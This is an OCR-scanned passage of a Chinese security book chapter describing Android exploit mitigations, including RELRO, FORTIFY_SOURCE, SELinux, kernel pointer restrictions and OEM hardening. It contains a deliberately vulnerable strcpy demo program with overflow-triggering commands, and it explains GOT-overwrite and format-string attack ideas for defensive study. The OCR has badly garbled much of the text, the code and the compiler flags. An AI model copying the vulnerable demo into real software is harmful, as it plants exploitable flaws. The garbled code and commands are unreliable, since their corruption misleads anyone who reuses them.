码 来 自 AOSP 源 代码 树 中 的 bionic/libc/include/stdio.h 文件 , 说 明了 printf 函数 如 何 使 用 这 一 注 
释 符 号 : 


























2377 Ht printt eonst "Char. 
238 "ttribute.a(( format, = (printf,. J; .27))) 
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这 个 函数 属性 有 三 个 参数 :第 一 个 是 函数 名 ; 后 两 个 是 要 传递 给 printf 的 参数 的 位 置 索引 ， 
从 1 开始 , 分 别 指向 格式 化 字符 串 本 身 的 索引 和 格式 化 字符 串 后 首 个 要 传人 参数 的 索引 。 有 许多 
使 用 这 种 方式 标记 的 函数 ,printf 只 是 之 一 ,如 果 使 用 了 可 变 参数 的 函数 没有 被 这 样 标 记 , GCC 
的 -wformat 警告 功能 将 无 法 检测 到 这 种 潜在 的 漏洞 情况 。 

Android 从 2.3 开始 对 分 发 的 二 进 制 文件 采用 -wformat-security 标志 进行 编译 。Android 
源 代码 在 2010 年 5 月 14 日 加 入 了 这 个 机 制 ,相关 的 commitid 是 d868cad。 这 个 commit 让 Android 
中 的 所 有 代码 在 编译 时 都 能 得 到 该 技术 的 保护 。 在 所 有 版 本 的 NDK 中 , 编译 器 都 支持 这 一 特性 ， 
但 是 直到 2013 年 7 月 发 布 的 r 版 , NDK 才 开 始 将 其 设置 为 默认 的 编译 标志 。 也 就 是 说 ， 除 非 开 
发 者 手动 指定 参数 ， 用 较 老 版 本 NDK 编译 的 代码 更 容易 受到 格式 化 字符 串 攻 击 的 影响 。 








































































































提示 “在 build/core/combo/TARGET linux-<arch>.mk 文件 中 可 以 找到 编译 AOSP 时 使 用 的 默认 
编译 器 参数 ， 其 中 <arch> 表 示 编 译 目 标的 架构 (通常 是 arm )。 


另 一 种 策略 是 禁用 sn 格式 化 指示 符 。 在 格式 化 字符 串 漏 洞 利用 中 , 这 个 指示 符 被 用 于 精确 地 

造成 内 存 破 坏 。2008 年 10 月 ,在 Android 的 第 一 个 公开 版 本 发 布 之 前 ，Android 开发 人 员 就 从 
Bionic 库 中 移 除 了 对 sn 指示 符 的 支持 。 禁 用 它 虽 然 能 让 一 些 问题 变 得 不 可 利用 , 但 并 不 能 从 整体 
上 人 解决 这 类 问题 。 攻 击 者 还 是 可 以 利用 其 它 格 式 化 指示 符 造成 缓冲 区 溢出 或 者 拒绝 服务 。 
还 有 一 种 策略 是 在 编译 时 将 _FORTIFY_SOURCE 值 赋 为 2。 这 个 缓解 技术 可 以 防止 格式 化 字 
符 串 使 用 驻 留 在 可 写 内 存 中 的 sn 指示 符 。 与 -W format-security 标志 不 同 ， 这 个 保护 措施 中 还 
包含 一 个 在 操作 系统 C 运行 时 库 中 实现 的 runtime 组 件 。 在 12.11 节 中 ， 可 以 看 到 关于 这 一 策略 
以 及 Android 对 其 支持 的 更 多 细节 。 


12.9 ”只 读 重 定位 表 


履 盖 用 于 解析 外 部 函数 的 指针 是 另 一 种 流行 的 内 存 破坏 型 漏洞 利用 技术 , 主要 是 修改 全 局 偏 
移 量 表 (Global Offset Table，GOT ) 中 的 地 址 ， 使 其 指向 攻击 者 构造 的 机 器 码 或 者 其 他 对 攻击 者 
有 用 的 函数 。 因 为 用 readelf 或 者 objdump 等 工具 可 以 很 容易 地 读 出 GOT 中 条 目的 地 址 ， 所 
以 这 项 技术 在 很 多 漏洞 利用 中 都 得 到 了 使 用 。 

Linux 的 长 期 贡献 者 Jakub Jelinek 在 binutils 邮件 列表 中 提出 了 一 个 补丁 , 用 于 防止 攻击 者 使 
用 这 一 技术 : http://www.sourceware.org/ml/binutils/2004-01/msg00070.html。 这 个 补丁 标志 着 一 种 
新 的 缓解 技术 诞生 ， 即 只 读 重 定位 表 ( Read-Only Relocations ，relro )。 使 用 编译 参数 
-W1,-z,relro， 编 译 器 生成 的 二 进 制 文件 就 会 启用 这 一 保护 。 可 以 用 readelf 工具 来 判断 某 
个 二 进 制 文件 是 否 已 经 使 用 了 这 一 缓解 措施 ， 如 下 所 示 : 


dev:~/android $ # cat binary from Android 1.5 
dev:~/android $ readelf -h cat-gl | grep RELRO 






















































































dev:~/android $ # cat binary from Androiqd 4.2.1 
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dev:~/android $ readelf -h cat-gn-takju | grep RELRO 
GNU_RELRO 0x01d334 0x0001e334 0x0001e334 0x00ccc 0x00ccc RW 0x4 


然而 ， 仅 仅 使 用 参数 -wl1, -z, relro 还 不 够 ; 此 时 得 到 的 是 部 分 relro，GOT 还 是 可 写 的 。 
要 发 挥 这 种 缓解 技术 的 最 大 能 力 , 达到 完全 relro, 还 需要 一 个 -Wl, -z,now 参数 。 下面 的 代码 展 
示 了 如 何 检查 relro 是 否 完全 : 


dev:~/android $ readelf -d cat-gn-takju | grep NOW 
0x0000001e (FLAGS) BIND_NOW 
Ox6ffffffb (FLAGS_1) Flags: NOW 


增加 新 的 参数 后 ，linker 会 在 程序 启动 时 加 载 其 所 有 依赖 库 ( 而 不 是 延迟 按 需 加 载 )。 因为 所 
有 依赖 库 都 已 经 得 到 解析 ， 所 以 linker 不 再 需要 更 新 GOT。 这 样 ， 在 该 程序 接 下 来 的 执行 期 间 ， 
GOT 就 可 以 被 标记 为 只 读 。 由 于 这 片 内 存 区 域 是 只 读 的 ， 在 不 改变 其 权限 的 情况 下 无 法 写 和 人数 
据 ， 因 此 任何 试图 写 人 GOT 的 行为 都 会 导致 该 进程 崩溃 ， 从 而 使 漏洞 利用 失败 。 

Android 在 2012 年 4 月 加 入 了 这 一 缓解 措施 ， 将 其 作为 4.1.1 版 的 一 部 分 发 布 。 它 使 用 了 上 
面 这 两 个 必需 的 参数 , 准确 地 实现 了 只 读 的 GOT 区域。 相关 的 AOSP commit id 是 233d460。 NDK 
则 从 8b 版 开始 启用 这 个 机 制 。 此 后 , 所 有 的 AOSP 和 NDK 都 默认 启用 这 个 编译 器 选项 。 与 格式 
化 字符 串 保 护 一 样 , 用 老 版 本 NDK 编译 的 源 代 码 可 能 会 存在 此 类 漏洞 , 开发 者 需要 用 新 的 NDK 
重新 编译 。 使 用 这 个 保护 机 制 后 ， 攻 击 者 就 无 法 再 改写 GOT 或 者 执行 其 中 保存 的 数据 了 。 








































































































12.10 ”小 盒 


自从 Google Chrome 发 布 以 来 ， 沙 盒 已 经 在 短 短 $ 年 间 成 为 一 种 非常 流行 的 缓解 技术 。 沙 
盒 的 主要 目的 是 进一步 实现 最 小 特权 原则 ， 主 要 方法 是 降低 程序 中 部 分 代码 的 特权 并 减少 其 功 
能 。 有 一 些 代 码 由 于 质量 较 低 或 者 面 对 不 可 信 数 据 的 暴露 面 更 广 ， 本 身 就 有 更 高 的 风险 。 在 受 
限 的 环境 中 运行 这 些 高 风险 代码 ， 有 助 于 防止 攻击 取得 成 功 。 例 如 ， 即 便 攻击 者 已 经 可 以 执行 
任意 代码 ， 沙 盒 也 可 以 防止 攻击 者 访问 敏感 数据 或 者 损害 系统 。 目 前 Windows 系统 中 的 一 些 流 
行 软 件 都 在 一 定 程 度 上 使 用 了 沙 盒 技 术 , 如 Microsoft Office 、Adobe Reader 、Adobe Flash Player 
和 Google Chrome 等 。 

从 第 一 版 开始 ，Android 就 使 用 了 某 种 形式 的 沙 盒 。 第 2 章 介绍 了 Android 使 用 不 同 的 用 户 
身份 来 隔离 不 同 的 进程 。 虽 然 这 种 形式 的 沙 盒 相当 粗糙 , 但 还 算是 一 种 有 效 的 沙 盒 . 此 后 ,Android 
4.1 加 入 了 隔离 服务 特性 , 允许 应 用 程序 创建 使 用 不 同 用 户 ID 的 另 一 个 隔离 进程 .基于 这 一 特性 ， 
Chrome for Android 在 运行 Jelly Bean 的 设备 上 使 用 的 沙 盒 比 之 前 版 本 Android 上 的 稍 强 一 些 。 
Android 的 未 来 版 本 可 能 还 会 对 此 进行 进一步 加 固 ， 有 具体 例子 参阅 12.18.1 节 。 


12.11 增强 源 代 码 


2004 年 ，Linux 的 长 期 贡献 者 Jakub Jelinek 创建 了 源 但 增强 缓解 机 制 ， 用 于 防止 一 般 性 的 组 
冲 区 溢出 缺陷 被 利用 。 这 个 机 制 由 两 部 分 构成 , 分 别 在 编译 需 和 操作 系统 的 C 语言 库 中 。 如 果 在 
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编译 源 代 码 时 启用 优化 ， 并 传人 -D_FoRTIFY_SsoURCE， 编 译 器 就 会 在 传统 易 出 错 的 函数 周围 包 
庄 男 一 层 代 码 。C 语言 库 中 的 这 些 包 库 函 数 会 以 多 种 方式 验证 在 运行 时 传人 原始 函数 的 参数 。 例 
如 , 将 传递 给 strcpy 的 目标 缓冲 区 尺寸 大 小 与 源 字 符 串 的 长 度 进行 比较 。 如 果 试 图 复制 的 字 节 
超出 目标 缓冲 区 的 大 小 ， 会 导致 验证 错误 和 程序 终止 。 

strcpy 只 是 许多 被 包 于 起 来 的 函数 之 一 。 哪 些 函 数 会 被 增强 则 取决 于 具体 的 实现 ,在 Ubuntu 
12.04 的 GCC 编译 器 和 C 语言 库 中 ， 有 70 多 个 函数 被 包 于 起 来 。 这 种 修改 危险 函数 的 通用 性 技 
术 非 常 强大 ， 用 处 并 不 仅 限于 检查 缓冲 区 溢出 。 事 实 上 ， 如 果 将 宏 的 值 定义 为 2， 就 可 以 启用 更 
多 的 检查 ， 包 括 一 些 对 格式 化 字符 串 攻 击 利用 的 防御 。 
下 面 是 在 Ubuntu 12.04 x86 64 机 器 上 使 用 FORTIFY_SOURCE 的 一 个 例子 : 


dev:~/android $ cat bof-test1.c 
#include <stdio.h> 
#include <string.h> 
int main(int argc, char *argv[]) { 
char. Batfl256l: 
StroByv (burt, agviLiy}.s 
return 0; 
} 
dev:~/android $ gcc -D_ FORTIFY_SOURCE=1 -02 -fno-stack-protector -o \ 
test bof-test.c 
dev:~/android $ ./test ‘ruby -e 'puts "A" * 512'. 
*** puffer overflow detected ***: ./test terminated 
= -= PaCktrade, SoS 













































































上 面 的 测试 程序 是 一 个 简单 的 人 为 构造 示例 , 其 中 存在 一 个 缓冲 区 溢出 漏洞 。 尝 试 向 缓冲 区 
复制 过 多 字 节 时 ， 程 序 检测 到 了 即将 发 生 的 内 存 错误 ， 然 后 终止 了 运行 。 

Android 在 4.2 的 开发 过 程 中 加 入 了 对 FORTIFY_SOURCE 的 实现 。 遗 憾 的 是 ，Android NDK 
现在 还 没有 支持 它 。Android 对 Bionic C 运行 时 库 进 行 了 一 系列 修改 ( commit id 分 别 为 0a23015、 
71al8dd、cffdf66、9b549c3、8df49ad、965dbc6、f3913b5 以 及 260bf8c )， 一 共 增 强 了 15 个 最 容 
易 犯 错 的 函数 。 下 面 的 代码 检查 了 Android 4.2.2 的 libcso 库 ， 用 Ubuntu CompilerFlags 帮助 页 面 
( https://wiki.ubuntu.com/ToolChain/CompilerFlags ) 的 一 条 命令 得 出 这 个 统计 结 











dev:~/android/source $ arm-eabi-readelf -a \ 
out/target/product/maguro/system/lib/libc.so \ 

egrep ' FUNC .* chk(@@| |$)' \ 

sed -re 's/ \([0-9]+\)$//g; s/.* //g; s/@.*//g;' \ 
egrep '^__.*_chks$' \ 

Sed Te "S/S /9 CR 全 

sort \ 

| wc -1 

15 


在 Android 4.4 之前， 只 有 FORTIFY_SOURCE 缓解 技术 的 第 1 级 ( 即 值 为 1 ) 得 到 了 实现 ， 
其 中 包含 对 缓冲 区 溢出 的 检查 ， 但 是 没有 实现 对 格式 化 字符 串 攻击 的 保护 。Android 的 实现 中 其 
至 加 入 了 一 些 专门 针对 Bionic 的 扩展 ， 比 如 检查 传递 给 strlen 限 数 以 及 strcpy 和 strlcat 
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这 两 个 BSD 风格 函数 的 参数 。Android 4.4 则 实现 了 FORTIFY_SOURCE 缓解 的 第 2 级 。 

在 运行 Android 4.2.2 的 Galaxy Nexus 设备 上 执行 测试 程序 ， 来 验证 FORTIFY_SOURCE 的 效 
果 。 编译 环境 是 在 一 台 Ubuntu x86_64 开发 机 上 检 出 的 AOSP 代码 库 , 标签 号 是 androigd-4.2.2_r1l。 
下 面 的 输出 显示 了 测试 的 结 
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1] 29074 











hell@android:/ $8 
1] + Segmentation fault /data/local/tmp/bof-test S$myvar 
shell@android:/ $ logcat -d | grep buffer 











dev:~/android/source $ . build/envsetup.h 
dev:~/android/source $ lunch full maguro-userdebug 


dev:~/android/source $ tar zxf ~/ahh/bof-test.tgz 
dev:~/android/source $ make bof-test 

[... build proceeds ...] 

dev:~/android/source $ adb push \ 
out/target/product/maguro/system/bin/bof-test /data/local/tmp 

121 KB/s (5308 bytes in 0.042s) 

dev:~/android/source $ adb shell 

shell@android:/ $ myvar= busybox seq 1 260 | busybox sed 's/.*/./' \ 
| busybox tr -d '\n'. 

hell@android:/ $ echo -n Smyvar | busybox wc -c 


s 
2 
shell@android:/ $ /data/local/tmp/bof-test Smyvar & 
[ 
s 
[ 


F/libc (29074): *** strcpy buffer overflow detected *** 


这 里 使 用 了 AOSP 的 构建 系统 来 编译 该 程序 ， 以 验证 FORTIFY_SOURCE 是 否 为 默认 的 编译 
项 。 可 以 看 到 ， 程 序 再 一 次 检测 到 即将 出 现 的 内 存 破坏 ， 并 且 终止 了 运行 。Android 没有 使 用 命 






























































令 行 终端 的 输出 界面 ， 而 是 通过 标准 的 1ogcat 机 制 输出 了 这 个 错误 。 
尽管 源 代码 增强 技术 非常 强大 , 但 并 非 没 有 缺点 。 首先 , 只 有 对 于 编译 器 已 知 大 小 的 缓冲 区 ， 


FORTIFY_SOURC 








E 才能 生效 。 如 果 传 给 strcpy 的 目的 指针 指向 可 变 大 小 的 缓冲 区 ， 就 无 法 验 





证 其 长 度 了 。 其 次 , 由 于 这 一 缓解 机 制 需要 在 编译 时 使 用 特殊 的 参数 ,所 以 无 法 保护 只 有 二 进 制 


文件 的 旧 组 件 。 恨 
许多 bug 被 利用 。 


12.12 ”访问 





了 便 如 此 ，FORTIFY_SOURCE 依然 是 一 个 非常 有 用 的 缓解 技术 ， 可 以 有 效 防止 


控制 机 制 


使 用 访问 控制 技术 , 系统 管理 员 可 以 限制 其 他 用 户 在 计算 机 系统 中 的 行为 。 该 技术 主要 有 两 








种 类 型 : 分 布 式 访问 控制 (Discretionary Access Control，DAC; 又 称 自主 访问 控制 ) 和 集中 式 访 
问 控制 (Mandatory Access Control，MAC; 又 称 强制 访问 控制 )。 还 有 一 种 机 制 叫 作 基于 角色 的 
访问 控制 (Role-Based Access Control，RBAC )， 它 与 DAC 和 MAC 类 似 ， 但 是 灵活 性 更 好 ， 可 
以 使 用 DAC 和 MAC 中 的 要 素 。 这 些 机 制 都 能 用 于 防止 低 权 限 用 户 访问 有 价值 的 系统 资源 或 者 
其 无 需 访问 的 资源 。 

MAC 和 DAC 虽然 都 用 于 保护 资源 不 被 访问 ， 但 是 在 控制 方式 上 有 很 大 区 别 : DAC 允许 用 
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户 自 己 修改 访问 策略 , 而 MAC 的 策略 则 完全 由 系统 管理 员 控制 。DAC 的 最 佳 例子 是 UNIX 文件 
系统 权限 : 普通 用 户 不 需要 系统 管理 员 的 授权 就 可 以 更 改 自己 所 拥有 文件 和 目录 的 访问 权限 , 从 
而 允许 其 他 用 户 访问 。MAC 的 相关 例子 是 SELinux， 系 统管 理 员 必 须 对 每 个 人 的 访问 权限 进行 
定义 和 维护 。 

从 2012 年 到 2013 年 年 初 ，Stephen Smalley、Robert Craig、Kenny Root、Joshua Brindle 和 
William Roberts 将 SELinux 移植 到 了 Android。2013 年 4 月， 三星 在 Galaxy S4 设备 中 实现 了 
SELinux。SELinux 有 3 种 实施 模式 : disabled 、permissive 和 enforcing。 在 disabled 模式 下 , SELinux 
存在 但 不 发 挥 作用 ; 在 permissive 模式 下 ，SELinux 会 将 违反 策略 的 行为 记录 下 来 ， 但 并 不 会 阻 
止 这 些 行为 ; 而 enforcing 模式 会 严格 地 实施 所 有 策略 ， 拒 绝 所 有 违反 策略 的 访问 。 在 Galaxy S4 
上 ， 默 认 的 实施 模式 是 permissive。 三 星 在 KNOX 企业 安全 产品 以 及 后 来 更 新 的 Galaxy S4 固件 
版 本 中 使 用 了 enforcing 模式 。 谷 歌 宣布 了 在 Android 4.3 中 对 SELinux 的 官方 支持 ， 但 是 只 采用 
了 permissive 模式 。Android 4.4 是 第 一 个 使 用 enforcing 模式 的 官方 版 本 。 

SELinux 并 不 是 目前 Android 设备 中 唯一 的 访问 控制 解决 方案 。 日 本 市 场 中 的 LG Optimus G 
设备 还 使 用 了 一 种 名 为 TOMOYO 的 MAC 实现 方案 ,在 设备 启动 时 ,由 ccs-init 加 载 的 TOMOYO 
策略 会 防止 shell 以 root 权限 运行 。 此 外 , 东芝 的 Excite 平板 电脑 中 有 一 个 名 为 sealime.ko 的 内 核 
模块 ， 似 乎 是 将 SELinux 移植 到 Android 上 的 准备 工作 。 

与 其 他 缓解 技术 一 样 ， MAC 方案 也 有 一 定 的 不 足 。 首 要 问题 是 , 恰当 的 配置 通常 非常 困难 。 
一 般 情 况 下 ， 策 略 的 开发 需要 将 MAC 设置 成 学 习 模 式 ， 然 后 进行 被 允许 的 操作 供 其 学 习 。 另 一 
种 方法 是 , 策略 制定 者 花费 很 长 时 间 针 对 所 有 被 允许 的 情况 人 工 制定 规则 。 这 两 种 方法 都 很 容易 
出 错 ， 因 为 总 有 一 些 得 到 允许 的 操作 被 忽略 ,或 者 作出 不 正确 的 假设 。 在 审核 基于 访问 控制 机 制 
的 系统 安全 性 时 ,对 这 些 策略 进行 评估 最 为 重要 。 只 要 配置 得 当 , 无 论 使 用 的 是 哪 种 实现 , MAC 
都 能 让 攻击 者 感到 极其 头痛 。 


12.13 ”保护 内 核 


多 年 来 ， 许 多 研究 人 员 (如 PaX 团队 成 员 和 Brad Spengler ) 都 致力 于 加 固 Linux 内 核 。 除 
了 (本 章 前 面 提 到 的 ) 用 户 空间 方面 的 工作 , 还 有 为 了 阻止 内 核 本 身 被 漏洞 利用 的 工作 。 然 而 ， 
他 们 无 法 让 自己 的 代码 修改 成 功 进入 官方 内 核 源 代码 ,只 有 极 少 数 研 究 人 员 ( 尤其 是 Kees Cook、 
Dan Rosenberg 和 Eric Paris ) 取得 了 有 限 的 胜利 。 也 就 是 说 , 说 服 内 核 维 护 者 实现 针对 特定 安全 
问题 的 加 固 机 制 依然 非常 具有 挑战 性 。 从 Kees 和 Eric 的 经 历来 看 , 要 实现 这 些 机 制 ,， 首先 开发 
出 针对 某 个 Linux 发 行 版 的 补丁 文件 很 有 帮助 。 本 节 接 下 来 介绍 Android 设备 中 使 用 到 的 Linux 
内 核 加 固 机 制 。 


12.13.1 ”指针 和 日 志 限 制 


kptr_restrict 和 dmesg_restrict 是 用 于 防止 本 地 普通 用 户 获得 敏感 内 核 内 存 地 址 信 
息 的 内 核 设 置 。 此 前 的 内 核 漏 洞 利用 通过 读 取 虚拟 文件 系统 来 获得 地 址 信息 , 这些 信息 的 输出 就 
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来 自 内 核 空间 。 漏洞 利用 的 开发 者 可 以 在 运行 期 间 实时 解析 这 些 信息 ， 从 而 不 需要 将 地 址 硬 编码 
到 利用 代码 中 ， 这 样 编写 的 利用 代码 可 以 直接 用 于 多 种 不 同 的 系统 。 

kptr_restrict 对 内 核 的 修改 主要 针对 printk 函数 。 具 体 来 说 ， 这 些 修改 让 内 核 开发 者 
可 以 在 输出 敏感 内 核 指针 值 时 使 用 spKX 这 个 特殊 的 格式 化 符 。 在 printk 函数 内 部 ， 对 于 不 同 的 
kptr_restrict 值 ， 这 个 格式 化 符 的 行为 也 不 同 。 当 kptr_restrict 被 设置 成 0 时 ， 这 些 值 
会 被 直接 输出 ; 设置 成 1 时， 除非 当前 用 户 有 CAP_ SYSLOG 权限 ,否则 这 些 值 会 被 奉 换 为 全 0; 
设置 成 2 时 , 这 些 值 总 是 会 被 替换 为 全 0。 如 果 一 个 进程 试图 访问 sysfs 和 procfs 文件 系统 中 的 条 
目 ， 例 如 /proc/kallsyms 文件 ， 这 个 保护 措施 就 会 运作 起 来 。 下 面 的 输出 来 自 运 行 Android 4.2.1 
的 Galaxy Nexus 设备 : 


shell@android:/ $ grep Slab alloc /proc/kallsyms 
00000000 七 slab alloc.isra.40.constprop.45 


可 以 看 到 ， 地 址 没有 被 准确 地 打印 出 来 ， 而 是 显示 为 8 个 0。 

与 此 类 似 ， dmesg_restrict 可 以 阻止 普通 用 户 使 用 dmesg 命令 或 klogctl 函数 访问 内 
核 回环 缓冲 区 (kernel ring buffer )。 下 面 这 段 话 来 自 提 交 给 Linux 内 核 邮 件 列表 ( LKML ) 的 原 
台 补 丁 文 件 : 

































































比 起 修改 数 百 (甚至 数 千 ) 条 printk 语句 并 砍 掉 有 用 的 调试 功能 , 创建 一 个 阻止 
普通 用 户 读 取 syslog 的 选项 要 容易 得 多 。 








与 持续 维护 可 能 泄露 的 敏感 指针 值 相 比 , 直接 保护 对 内 存 回 环 缓冲 区 的 访问 确实 更 加 轻松 高 
效 。 此 外 ， 有 一 些 Linux 内 核 开 发 者 十 分 反对 实现 kptr_restrict 所 引起 的 改变 。 

这 些 加 固 机 制 由 Dan Rosenberg 开发 ， 首 次 进入 的 Linux 内 核 版 本 是 2.6.38。 因 此 ， 使 用 这 
个 版 本 或 后 续 版 本 内 核 的 Android 设备 中 都 有 对 这 一 特性 的 支持 , 但 是 不 一 定 被 启用 。2011 年 11 月 ， 
2e7c833 和 色 557fb 两 个 commit 被 提交 到 AOSP， 它 们 在 默认 initrc 文件 中 分 别 将 kptr_restrict 
和 qmesg_restrict 的 值 设 置 为 2 和 1。Andriod 4.1.1 是 第 一 个 包含 了 这 些 变化 的 版 本 。 






































注意 Linux 内 核 源 代码 树 的 Documentation/sysctl/kernel.txt 文 件 中 有 关于 这 些 设置 的 更 多 介绍 。 


12.13.2 ”保护 零 地 址 页 


空 指针 解 引 用 是 影响 内 核 代 码 的 一 个 问题 。 在 Linux 系统 中 的 最 低 内 存 地址 ( 0x00000000 ) 
处 通常 不 会 映射 任何 内 容 。 但 是 ， 在 2007 年 Eric Paris 实现 mmap_min_aggr 保护 措施 之 前 ， 攻 
击 者 可 以 在 用 户 空间 映射 这 个 零 地 址 页 , 然后 将 任意 内 容 填 进 这 片 内 存 区 域 。 通过 触发 内 核 空间 
的 空 指针 相关 问题 ， 在 许多 情况 下 就 可 以 导致 内 核 空间 任意 代码 执行 。 

保护 方法 mmap_min_aggr 的 原理 很 简单 , 就 是 阻止 用 户 空间 进程 映射 低 于 指定 净值 的 内 存 
页 。 为 其 设 定 的 默认 值 是 4096， 用 于 防止 映射 最 低 的 页 。 不 过 目前 绝 大 部 分 操作 系统 都 会 进 一 
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步 提高 这 个 值 。 

这 个 保护 机 制 从 Linux 2.6.23 开始 进入 内 核 。Android 的 官方 文档 称 2.3 版 首次 采用 了 这 个 保 
护 机 制 ， 然 而 对 一 系列 设备 进行 测试 的 结果 显示 ， 它 在 运行 Android 2.1 的 设备 中 就 已 经 存在 了 。 
2011 年 ， 编 号 为 27cca21 的 commit 将 默认 initrc 文件 中 的 这 个 值 改 为 32768。Android 4.1.1 是 第 
一 个 包含 这 一 变化 的 版 本 。 


12.13.3 ”只 读 的 内 存 区 域 


利用 Linux 内 核 漏洞 时 ， 经 常 要 修改 函数 指针 、 数 据 结果 或 者 内 核 的 代码 。 为 了 限制 这 类 攻 
击 ， 有 些 Android 设备 将 内 核 的 某 些 内 存 区 域 设 置 为 只 读 来 进行 保护 。 可 惜 的 是 ， 只 有 基于 高 通 
MSM 芯片 的 设备 (如 Nexus 4 ) 启用 了 这 类 内 存 保护 。 

2011 年 2 月 ,Larry Bassel 为 MSM 内 核 源 码 增加 了 一 个 名 为 CONFIG_STRICT_MEMORY_RWX 
的 内 核 配置 选项 。 下 面 是 SMS 内 核 源 代码 树 中 arch/arm/mm/mmu.c 文件 的 片段 : 


#ifdef CONFIG_STRICT_ MEMORY_RWX 







































































map.pfn = phys_to pfn(_ pal(__start_rodata)); 
map.virtual = (unsigned long)_ start_rodata; 
map.length = _ init begin - _ start_rodata; 


map.type = MT_ MEMORY_R; 
create mapping(&map, false); 
#else 
map.length = end - start; 


map.type = MT_MEMORY; 
#endif 


可 以 看 到 ， 在 启用 CONFIG_STRICT_MEMORY_RWX 的 情况 下 ， 内 核 在 为 只 读数 据 创 建 内 存 
区 域 时 会 使 用 类 型 为 MT_MEMORY_R 的 内 存 。 使 用 这 种 设置 时 , 硬件 会 阻止 对 该 内 存 区 域 的 写 和 人。 

不 过 这 一 保护 措施 也 存在 一 些 缺陷 。 首 先 , 将 内 存 切 分 成 许多 节 会 导致 少量 的 内 存 浪费 。 如 
果 这 些 节 小 于 1MB ， 剩 下 的 空间 就 会 被 浪费 。 其 次 ， 绥 存 系统 的 性 能 会 受到 轻微 影响 。 最 后 ， 
会 让 内 核 代码 无 法 写作, 使 调试 变 得 复杂 。 在 内 核 调试 时 , 通常 会 在 代码 中 插入 断 点 指令 ， 用 于 
调试 内 核 的 工具 在 此 时 无 法 操作 只 读 的 内 核 代码 段 。 


12.14 ”其 他 加 固 措施 


除了 前 面 提 到 的 利用 缓解 机 制 ，Android 生态 系统 中 的 许多 利益 相关 者 还 实现 了 一 些 其 他 的 
加 固 措施 。Android 官方 和 OEM 经 常 直 接 针对 已 公开 的 一 些 漏洞 利用 手段 或 代码 对 操作 系统 作 
出 相应 的 改进 。 其 中 一 些 可 以 从 根本 上 阻止 漏洞 利用 , 但 也 有 很 多 只 是 在 已 知 攻击 手段 面前 简单 
地 设置 了 一 个 障碍 。 也 就 是 说 ， 这 些 障 碍 只 能 阻止 攻击 全 过 程 中 的 某 些 步骤。 通常 ， 这 些 步骤 对 
于 漏洞 利用 来 说 都 不 是 必需 的 ,攻击 者 使 用 起 来 也 很 容易 。 不 过 即便 效果 不 大 ,这 些 改进 措施 也 
还 是 提高 了 Android 系统 的 整体 安全 性 。 
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三 星 对 其 设备 上 运行 的 定制 版 Android 作 了 大 量 的 修改 。 前 面 已 经 提 到 , 三 星 在 Galaxy S4 
上 实现 了 SELinux。 在 Galaxy S2 和 S3 等 一 些 设备 中 ， 三 星 修 改 了 adbd 文件 ， 让 其 始终 降 权 
运行 。 这 样 可 以 让 一 些 利 用 build.prop 和 local.prop 中 标志 位 来 获得 root 权限 的 方法 失效 。 三 
星 在 编译 时 禁用 了 ALLOW_ADBD_ROOT 标志 (定义 在 AOSP 源 代码 树 的 system/core/adb/adb.c 
文件 中 )， 轻 松 地 实现 了 这 一 点 。Galaxy S4 发 布 时 ， 三 星 还 修改 了 其 Linux 内 核 ， 增 加 了 一 个 
编译 时 的 内 核 选项 CONFIG_SEC_RESTRICT_SETUID, 用 于 防止 代码 从 非 root 情 况 提 权 到 root。 
在 某 些 特定 的 情况 下 ， 只 要 将 root 用 户 的 ID (也 就 是 0) 传 给 setuid 和 setgid 系列 函数 ， 
就 会 导致 内 核 返 回 错误 ， 从 而 阻止 提 权 操作 。Galaxy S4 还 引入 了 一 个 名 为 CONFIG_SEC_ 
RESTRICT_FORK 的 内 核 选项 , 用 于 防止 以 root 用 户 身 份 执行 /data/ 目 录 下 的 程序 。 此 外 ,还 能 
防止 非 root 进程 以 root 权限 创建 新 的 进程 。 

其 他 OEM 也 实现 了 一 些 自己 的 加 固 方案 。HTC 的 一 个 著名 方案 是 NAND 存储 的 加 锁 机 制 ， 
也 就 是 所 谓 的 S-ON。 启 用 这 个 机 制 后 ， 即 使 内 存 中 某 块 区 域 的 分 区 已 经 被 mount 成 了 可 读 可 写 
的 模式 ， 也 能 阻止 对 这 块 区域 的 写 和 人。 这 样 ， 除 非 禁 用 该 NAND 保护 ， 否 则 漏洞 利用 代码 无 法 
修改 /system 分 区 。 东 芝 也 在 某 个 型 号 的 设备 中 引入 了 名 为 sealime.ko 的 内 核 模 块 , 前面 已 经 介绍 
过 ， 该 模块 实现 了 许多 类 似 于 SELinux 的 安全 限制 。 

在 Nick Kralevich 的 带领 下 ，Android 官方 团队 对 核心 操作 系统 进行 了 渐进 式 的 改进 和 加 固 。 
特别 是 在 4.0.4、4.1 和 4.2.2 发 布 时 ， 许 多 改动 使 一 些 特定 的 漏洞 利用 变 得 更 困难 或 失效 。 

在 4.0.4 发 布 后 ，Android 中 的 init 程序 在 处 理 initrc 配置 中 的 cnmod、chown 和 mkdir 操 
作 时 ， 不 再 跟随 符号 链接 进行 操作 。 这 个 变动 对 应 system/core/init 仓库 的 两 个 commit: 42a9349 
和 9edlfe7， 可 以 有 效 阻 止 基于 init 脚本 中 符号 链接 文件 系统 的 漏洞 利用 。 第 3 章 包含 一 个 这 样 
的 案例 。 

Android 4.1 对 log 日 志 功 能 和 umask 属性 进行 了 改动 。 对 于 前 者 ， 从 这 个 版 本 开始 , 第 三 方 
软件 不 能 再 使 用 READ_LoGS 权限 。 这 可 以 防止 间谍 软件 读 取 其 他 应 用 程序 log 日 志 中 可 能 存在 
的 敏感 信息 。 例 如 ， 网 银 软件 可 能 粗心 地 将 用 户 密码 记录 到 了 log 日 志 中 ， 间 谍 软 件 就 可 能 会 读 
取 到 这 个 密码 并 回 传 给 攻击 者 。4.1 之 后 ， 所 有 第 三 方 软件 都 只 能 读 取 自己 的 日 志 数 据 。 对 于 后 
者 ， 主 要 修改 了 默认 的 umask 值 。 创 建文 件 和 文件 夹 时 ， 如 果 没 有 明确 地 设置 权限 ， 这 个 值 将 
用 于 生成 权限 。 此 前 ，umask 的 默认 值 是 0000， 这 意味 着 文件 和 目录 可 以 被 系统 中 其 他 任何 用 
户 〈 任 何 应 用 程序 ) 写 入 。Android 4.1 将 其 修改 为 0077， 从 而 默认 文件 只 能 被 其 创建 者 访问 。 
这 两 个 改进 都 提高 了 Android 设备 的 整体 安全 性 。 





























































































































警告 ”在 修改 umask 的 默认 设置 时 ， 专 门 为 ADB 创建 了 一 个 例外 , 使 得 ADB 创建 的 文件 依然 
完全 自由 的 访问 权限 。 因 此 ， 用 ADB 创建 文件 时 需要 特别 小 心 。 


